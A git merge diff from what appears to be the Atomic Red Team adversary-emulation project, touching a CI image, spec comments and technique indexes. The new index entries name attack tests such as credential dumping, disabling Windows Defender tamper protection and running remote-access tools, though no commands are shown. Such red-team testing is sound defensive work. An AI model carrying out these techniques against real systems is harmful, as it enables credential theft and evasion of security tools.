Merge branch 'master' into nav-filter2

.circleci/config.yml

@@ -2,7 +2,7 @@ version: 2
 
 defaults: &defaults
   docker:
-    - image: circleci/ruby:2.4
+    - image: cimg/ruby:2.4
 
 workflows:
   version: 2

atomic_red_team/spec.yaml

@@ -123,41 +123,18 @@ atomic_tests:
   # at this time and their required options include:
   #
   #   - `command_prompt` : The Windows Command Prompt, aka cmd.exe
-  #       Requires the "command" option that is a multi-line script that will be preprocessed and
-  #       then executed by cmd.exe
-  #
-  #       Example:
-  #       - name: command_prompt
-  #         command: |
-  #           echo "attack starting"
-  #           echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
   #
   #   - `powershell` : Powershell
-  #       Requires the "`command`" option that is a multi-line script that will be preprocessed and
-  #       then executed by cmd.exe
-  #
-  #       Example:
-  #       - name: powershell
-  #         command: |
-  #           Write-Debug "attack starting"
-  #           Write-Debug "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
   #
   #   - `sh` : Linux's bourne shell
-  #       Requires the "`command`" option that is a multi-line script that will be preprocessed and
-  #       then executed by cmd.exe
-  #
-  #       Example:
-  #       - name: sh
-  #         command: |
-  #           echo "attack starting"
-  #           echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
   #
   #   - `bash` : Linux's bourne again shell
-  #       Requires the "`command`" option that is a multi-line script that will be preprocessed and
-  #       then executed by cmd.exe
+  #
+  #       Each of the above requires the "command" option that is a multi-line script that will be preprocessed and
+  #       then executed by cmd.exe, powershell.exe, sh or bash respectively
   #
   #       Example:
-  #       - name: bash
+  #         name: command_prompt
   #         command: |
   #           echo "attack starting"
   #           echo "running command 1: this is the value of the FOOBAR input_argument: #{FOOBAR}"
@@ -169,7 +146,7 @@ atomic_tests:
   #       multi-line list of instructions (also preprocessed)
   #
   #       Example:
-  #       - name: manual
+  #         name: manual
   #         steps: |
   #           1. Navigate to [chrome://extensions](chrome://extensions) and
   #           tick 'Developer Mode'.
@@ -179,7 +156,7 @@ atomic_tests:
   #
   #           3. Click the '#{FOOBAR}' button - you can interpolate here too!
   #
-  - name: command_prompt
+    name: command_prompt
     elevation_required: true 
     # indicates whether command must be run with admin privileges. 
     #If the elevation_required attribute is not defined, the value is assumed to be false
@@ -201,5 +178,5 @@ atomic_tests:
   # in this example we have no input arguments
   input_arguments:
   executor:
-  - name: bash
+    name: bash
     command: echo "Hello world!"

atomics/Indexes/Indexes-CSV/index.csv

@@ -6,6 +6,7 @@ credential-access,T1003.008,/etc/passwd and /etc/shadow,4,"Access /etc/{shadow,p
 credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
 credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
+credential-access,T1003.005,Cached Domain Credentials,1,Cached Credential Dump via Cmdkey,56506854-89d6-46a3-9804-b7fde90791f9,command_prompt
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
 credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
@@ -404,6 +405,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defende
 defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Windows Defender Tamper Protection,5fde6578-9419-46ef-9258-269dc8656c3e,powershell
 defense-evasion,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
 defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
@@ -446,6 +448,7 @@ defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/U
 defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
 defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
 defense-evasion,T1553.004,Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
+defense-evasion,T1553.004,Install Root Certificate,6,Add Root Certificate to CurrentUser Certificate Store,ca20a3f1-42b5-4e21-ad3f-1049199ec2e0,powershell
 defense-evasion,T1218.004,InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
 defense-evasion,T1218.004,InstallUtil,2,InstallHelper method call,d43a5bde-ae28-4c55-a850-3f4c80573503,powershell
 defense-evasion,T1218.004,InstallUtil,3,InstallUtil class constructor method call,9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93,powershell
@@ -507,6 +510,8 @@ defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Featu
 defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
 defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
 defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
+defense-evasion,T1112,Modify Registry,33,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
+defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -576,6 +581,8 @@ defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c
 defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
 defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
 defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
+defense-evasion,T1564.006,Run Virtual Instance,2,Create and start VirtualBox virtual machine,88b81702-a1c0-49a9-95b2-2dd53d755767,command_prompt
+defense-evasion,T1564.006,Run Virtual Instance,3,Create and start Hyper-V virtual machine,fb8d4d7e-f5a4-481c-8867-febf13f8b6d3,powershell
 defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
 defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
 defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
@@ -1105,6 +1112,7 @@ command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test o
 command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
 command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
 command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
+command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
 command-and-control,T1132.001,Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
 command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
 command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -1,6 +1,7 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
 credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
+credential-access,T1003.005,Cached Domain Credentials,1,Cached Credential Dump via Cmdkey,56506854-89d6-46a3-9804-b7fde90791f9,command_prompt
 credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
@@ -265,6 +266,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defende
 defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defender Control,178136d8-2778-4d7a-81f3-d517053a4fd6,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Windows Defender Tamper Protection,5fde6578-9419-46ef-9258-269dc8656c3e,powershell
 defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
 defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt
 defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt
@@ -285,6 +287,7 @@ defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution -
 defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt
 defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
 defense-evasion,T1553.004,Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
+defense-evasion,T1553.004,Install Root Certificate,6,Add Root Certificate to CurrentUser Certificate Store,ca20a3f1-42b5-4e21-ad3f-1049199ec2e0,powershell
 defense-evasion,T1218.004,InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell
 defense-evasion,T1218.004,InstallUtil,2,InstallHelper method call,d43a5bde-ae28-4c55-a850-3f4c80573503,powershell
 defense-evasion,T1218.004,InstallUtil,3,InstallUtil class constructor method call,9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93,powershell
@@ -336,6 +339,8 @@ defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Featu
 defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
 defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
 defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
+defense-evasion,T1112,Modify Registry,33,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
+defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -399,6 +404,8 @@ defense-evasion,T1036.003,Rename System Utilities,8,Malicious process Masqueradi
 defense-evasion,T1036.003,Rename System Utilities,9,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt
 defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
 defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
+defense-evasion,T1564.006,Run Virtual Instance,2,Create and start VirtualBox virtual machine,88b81702-a1c0-49a9-95b2-2dd53d755767,command_prompt
+defense-evasion,T1564.006,Run Virtual Instance,3,Create and start Hyper-V virtual machine,fb8d4d7e-f5a4-481c-8867-febf13f8b6d3,powershell
 defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
 defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
 defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
@@ -688,6 +695,7 @@ command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test o
 command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
 command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
 command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
+command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
 command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
 command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
 command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -12,7 +12,8 @@
 - [T1552.003 Bash History](../../T1552.003/T1552.003.md)
   - Atomic Test #1: Search Through Bash History [linux, macos]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1003.005 Cached Domain Credentials](../../T1003.005/T1003.005.md)
+  - Atomic Test #1: Cached Credential Dump via Cmdkey [windows]
 - T1552.005 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1552.007 Container API](../../T1552.007/T1552.007.md)
   - Atomic Test #1: ListSecrets [containers]
@@ -634,6 +635,7 @@
   - Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
   - Atomic Test #26: Disable Windows Defender with DISM [windows]
   - Atomic Test #27: Disable Defender with Defender Control [windows]
+  - Atomic Test #28: Disable Windows Defender Tamper Protection [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -707,6 +709,7 @@
   - Atomic Test #3: Install root CA on macOS [macos]
   - Atomic Test #4: Install root CA on Windows [windows]
   - Atomic Test #5: Install root CA on Windows with certutil [windows]
+  - Atomic Test #6: Add Root Certificate to CurrentUser Certificate Store [windows]
 - [T1218.004 InstallUtil](../../T1218.004/T1218.004.md)
   - Atomic Test #1: CheckIfInstallable method call [windows]
   - Atomic Test #2: InstallHelper method call [windows]
@@ -782,6 +785,8 @@
   - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
   - Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
   - Atomic Test #32: Windows Powershell Logging Disabled [windows]
+  - Atomic Test #33: Windows Add Registry Value to Load Service in Safe Mode without Network [windows]
+  - Atomic Test #34: Windows Add Registry Value to Load Service in Safe Mode with Network [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
@@ -890,6 +895,8 @@
   - Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
 - [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
   - Atomic Test #1: Register Portable Virtualbox [windows]
+  - Atomic Test #2: Create and start VirtualBox virtual machine [windows]
+  - Atomic Test #3: Create and start Hyper-V virtual machine [windows]
 - [T1218.011 Rundll32](../../T1218.011/T1218.011.md)
   - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
   - Atomic Test #2: Rundll32 execute VBscript command [windows]
@@ -1819,6 +1826,7 @@
   - Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
   - Atomic Test #4: GoToAssist Files Detected Test on Windows [windows]
   - Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
+  - Atomic Test #6: Ammyy Admin Software Execution [windows]
 - [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
   - Atomic Test #1: Base64 Encoded data. [macos, linux]
   - Atomic Test #2: XOR Encoded data. [windows]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -5,7 +5,8 @@
   - Atomic Test #1: Rubeus asreproast [windows]
   - Atomic Test #2: Get-DomainUser with PowerView [windows]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1003.005 Cached Domain Credentials](../../T1003.005/T1003.005.md)
+  - Atomic Test #1: Cached Credential Dump via Cmdkey [windows]
 - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
   - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
 - T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -441,6 +442,7 @@
   - Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
   - Atomic Test #26: Disable Windows Defender with DISM [windows]
   - Atomic Test #27: Disable Defender with Defender Control [windows]
+  - Atomic Test #28: Disable Windows Defender Tamper Protection [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -486,6 +488,7 @@
 - [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md)
   - Atomic Test #4: Install root CA on Windows [windows]
   - Atomic Test #5: Install root CA on Windows with certutil [windows]
+  - Atomic Test #6: Add Root Certificate to CurrentUser Certificate Store [windows]
 - [T1218.004 InstallUtil](../../T1218.004/T1218.004.md)
   - Atomic Test #1: CheckIfInstallable method call [windows]
   - Atomic Test #2: InstallHelper method call [windows]
@@ -548,6 +551,8 @@
   - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
   - Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
   - Atomic Test #32: Windows Powershell Logging Disabled [windows]
+  - Atomic Test #33: Windows Add Registry Value to Load Service in Safe Mode without Network [windows]
+  - Atomic Test #34: Windows Add Registry Value to Load Service in Safe Mode with Network [windows]
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
   - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
@@ -639,6 +644,8 @@
 - T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
   - Atomic Test #1: Register Portable Virtualbox [windows]
+  - Atomic Test #2: Create and start VirtualBox virtual machine [windows]
+  - Atomic Test #3: Create and start Hyper-V virtual machine [windows]
 - [T1218.011 Rundll32](../../T1218.011/T1218.011.md)
   - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
   - Atomic Test #2: Rundll32 execute VBscript command [windows]
@@ -1135,6 +1142,7 @@
   - Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
   - Atomic Test #4: GoToAssist Files Detected Test on Windows [windows]
   - Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
+  - Atomic Test #6: Ammyy Admin Software Execution [windows]
 - [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
   - Atomic Test #2: XOR Encoded data. [windows]
 - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Matrices/matrix.md

@@ -6,7 +6,7 @@
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [AS-REP Roasting](../../T1558.004/T1558.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | [Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
 | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Add-ins](../../T1137.006/T1137.006.md) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | [Cached Domain Credentials](../../T1003.005/T1003.005.md) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
